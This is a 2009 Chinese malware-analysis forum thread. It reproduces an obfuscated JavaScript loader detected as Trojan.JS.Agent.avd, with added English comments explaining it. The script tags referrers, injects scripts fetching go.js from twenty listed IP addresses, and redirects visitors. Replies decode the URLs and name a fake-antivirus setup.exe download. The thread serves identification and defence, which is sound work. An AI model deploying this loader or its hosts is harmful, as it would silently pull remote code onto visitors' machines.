
[已鉴定] hxxp://suntico-dev.com/950/index.php?go (求解)

幸福的猪猪
发表于 2009-12-12 11:45:32 | 显示全部楼层 |阅读模式
本帖最后由 幸福的猪猪 于 2009-12-12 11:50 编辑

卡巴斯基报:Trojan.JS.Agent.avd

以下是复制出来的网页源代码:


  1. <script>
  2. // KROTEG
  // Referrer lookup table: each entry pairs a social-network domain substring
  // (column 0) with a short tag (column 1). The loop further down tests
  // document.referrer against column 0 and, on the first hit, places column 1
  // into a '/f=<tag>' path segment of the outgoing request.
  // msplinks.com and lnk.ms carry the same 'ms' tag as myspace.com.
  3. var nyjhaudxqpfltrzovb5 = [
  4. ['facebook.com', 'fb2'],
  5. ['tagged.com', 'tg'],
  6. ['friendster.com','fr'],
  7. ['myspace.com', 'ms'],
  8. ['msplinks.com', 'ms'],
  9. ['lnk.ms', 'ms'],
  10. ['myyearbook.com','yb'],
  11. ['fubar.com', 'fu'],
  12. ['twitter.com', 'tw'],
  13. ['hi5.com', 'hi5'],
  14. ['bebo.com', 'be']
  15. ];
  // Host list: 20 IPv4 addresses, each written as two concatenated string
  // fragments so that no full dotted address appears as a single literal in the
  // page source (presumably to defeat plain string matching; the page does not
  // say). The injection loop at the end of the script requests go.js from every
  // entry, so each address is a network indicator in its own right.
  16. var koatphcqzdfyn3 = [
  17. '84.108' + '.201.115',
  18. '99.236' + '.198.29',
  19. '209.' + '237.70.23',
  20. '82.2' + '.200.130',
  21. '99.68' + '.108.48',
  22. '69.1' + '51.177.17',
  23. '173.19' + '.66.108',
  24. '98.6' + '4.120.184',
  25. '2' + '17.132.206.13',
  26. '93.1' + '72.118.225',
  27. '190.' + '213.59.90',
  28. '96' + '.32.255.162',
  29. '24.151' + '.252.86',
  30. '76' + '.187.28.115',
  31. '75.87' + '.196.183',
  32. '69' + '.244.21.21',
  33. '21' + '2.30.204.44',
  34. '75.141' + '.137.188',
  35. '1' + '73.21.48.201',
  // NOTE(review): the trailing comma after the last entry makes legacy JScript
  // engines (IE 8 and earlier) count one extra, undefined element. That would
  // account for the 'http://undefined/go.js' tag in the rendered output quoted
  // later in this thread.
  36. '173.32' + '.167.235',
  37. ];
  // Four empty strings. They are spliced between the fragments of the eval()
  // argument on the next line and add nothing to the resulting text.
  38. var tovsizy0 = '', rjxfoq2 = '', gpfknwlmqirozedstx6 = '', hgzcxlkqnfmyrpib0 = '';
  // The eval() argument reassembles to 'document.referrer'; the identifier is
  // split up so that it never appears whole in the source.
  // ucglixmhwqknroa9 = referrer coerced to a string.
  // qebduwt3 = referrer tag segment, empty until one of the rules below matches.
  39. var ucglixmhwqknroa9 = '' + eval('doc'+tovsizy0+'ume'+rjxfoq2+'nt.r'+gpfknwlmqirozedstx6+'efer'+hgzcxlkqnfmyrpib0+'rer'), qebduwt3 = '';
  // The first table entry whose domain occurs anywhere in the referrer wins.
  // indexOf is a substring test, not a hostname comparison.
  40. for (var oybimfjdcgeszr0 = 0; oybimfjdcgeszr0 < nyjhaudxqpfltrzovb5.length; oybimfjdcgeszr0 ++) {
  41. if ((ucglixmhwqknroa9.indexOf(nyjhaudxqpfltrzovb5[oybimfjdcgeszr0][0]) != -1)) {
  42. qebduwt3 = '/f=' + nyjhaudxqpfltrzovb5[oybimfjdcgeszr0][1];
  43. break;
  44. }
  45. }
  // A Google Reader shared-item referrer that also contains '?id=' is given the
  // same 'ms' tag as the MySpace entries, overriding any table match.
  46. if ((ucglixmhwqknroa9.indexOf('google.com/reader/shared') != -1) && (ucglixmhwqknroa9.indexOf('?id=') != -1)) qebduwt3 = '/f=ms';
  // The landing URL can force the 'ms' tag by itself through '?go&ms'.
  47. if (location.href.indexOf('?go&ms') != -1) qebduwt3 = '/f=ms';
  // Cleared here and polled by nucqajgxvms4() below. Nothing in this listing
  // assigns it a non-empty value; presumably the remotely loaded go.js does
  // (that script is not shown on the page).
  48. window.redirect = '';
  // Poll loop: reads window.redirect (through eval of a split-up string) and,
  // once the value is non-empty, navigates the current page to it; otherwise it
  // re-arms itself after 50 ms. The string passed to setTimeout is itself
  // evaluated as code, so both branches rely on dynamic evaluation.
  // Nothing in this listing sets window.redirect, so the final destination is
  // presumably supplied by one of the injected go.js responses and cannot be
  // read from this page alone.
  49. function nucqajgxvms4() {
  50. var rbhyojlct5 = '' + eval('win'+'dow.r'+'edir'+'ect;');
  51. if (rbhyojlct5.length > 0) eval('wi'+'ndow'+'.lo'+'cati'+'on.hr'+'ef = rbhyojlct5;');
  52. else setTimeout('nucqajgxvms4()', 50);
  53. }
  // Start polling immediately, before any remote script has been requested.
  54. nucqajgxvms4();
  // Pick the path segment 'js' that is sent to the remote hosts. It defaults to
  // '/view'; l holds location.href, read through eval of a split-up string.
  55. var js = '/vi'+'ew', l = '' + eval('loc'+'at'+'ion.'+'hr'+'ef');
  // Look for an '?id=' parameter in the landing URL.
  56. var n = l.indexOf('?i'+'d=');
  57. if (n != -1) {
  // Parse the number that follows '?id=' (4 characters past the match).
  // parseInt is called without a radix.
  58. n = parseInt(l.substr(n + 4));
  // Range map: below 101 -> '/cnet', below 201 -> '/view', below 301 -> '/scan',
  // below 401 -> '/view', below 501 -> '/youtube'. Any other result, including
  // NaN (every comparison is then false), keeps the default '/view'.
  59. if (n < 101) js = '/c'+'ne'+'t';
  60. else if (n < 201) js = '/vi'+'ew';
  61. else if (n < 301) js = '/sc'+'an';
  62. else if (n < 401) js = '/vi'+'ew';
  63. else if (n < 501) js = '/y'+'out'+'ube';
  64. }
  // ss = location.search, appended verbatim to every request below.
  65. var ss = '' + eval('l'+'oca'+'ti'+'on.s'+'ear'+'ch');
  // No-op: both branches of the ternary leave ss as it already is.
  66. ss = (ss.length > 0 ? ss : '');
  // Injection loop: for every entry of koatphcqzdfyn3 a <script> element is
  // created and appended to <head>, so the browser requests
  //   http://<ip>/go.js?0x3E8<referrer tag><js>/console=yes/<location.search>
  // from each listed host. '0x3E8' is sent as literal text (it is hex for 1000);
  // what it stands for is not visible in this listing.
  // For detection: one page load produces a burst of script requests to bare IP
  // addresses, all for /go.js with this query layout.
  // The loop variable is the same var already used by the referrer loop above.
  67. for (var oybimfjdcgeszr0 = 0; oybimfjdcgeszr0 < koatphcqzdfyn3.length; oybimfjdcgeszr0 ++) {
  // nn = 'script'; it is reused on the next line to spell 'text/javascript'.
  68. var nn = 'sc'+'rip'+'t', oxckdfgn8 = document.createElement(nn);
  69. oxckdfgn8.type = 'te'+'xt'+'/ja'+'va'+nn;
  70. oxckdfgn8.src = 'ht'+'tp:'+'//' + koatphcqzdfyn3[oybimfjdcgeszr0] + '/go' + '.js' + '?0x'+'3E'+'8' + qebduwt3 + js + '/co'+'nsol'+'e=y'+'es/' + ss;
  // Appending to <head> is what triggers the fetch and execution of go.js.
  71. document.getElementsByTagName('h'+'ea'+'d')[0].appendChild(oxckdfgn8);
  72. }

  73. </script>
zdlzp
发表于 2009-12-12 15:36:25 | 显示全部楼层
hxxp://99.236.198.29/d=suntico-dev.com/0x3E8/view/console=yes/setup.exe
knifed
发表于 2009-12-12 16:31:32 | 显示全部楼层
本帖最后由 knifed 于 2009-12-12 16:32 编辑

oxckdfgn8.src = 'ht'+'tp:'+'//' + koatphcqzdfyn3[oybimfjdcgeszr0] + '/go' + '.js' + '?0x'+'3E'+'8' + qebduwt3 + js + '/co'+'nsol'+'e=y'+'es/' + ss;  这一句大致会从以下地址加载 go.js(列表中的每个 IP 各生成一个 script 标签):
<SCRIPT src="http://84.108.201.115/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://99.236.198.29/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://209.237.70.23/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://82.2.200.130/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://99.68.108.48/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://69.151.177.17/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://173.19.66.108/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://98.64.120.184/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://217.132.206.13/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://93.172.118.225/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://190.213.59.90/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://96.32.255.162/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://24.151.252.86/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://76.187.28.115/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://75.87.196.183/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://69.244.21.21/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://212.30.204.44/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://75.141.137.188/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://173.21.48.201/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://173.32.167.235/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT 
src="http://undefined/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT>
看起来像是个假冒杀毒软件(fake AV)。
最终想下载 hxxp://82.2.200.130/d=suntico-dev.com/0x3E8/view/console=yes/setup.exe
有几个地址貌似打不开。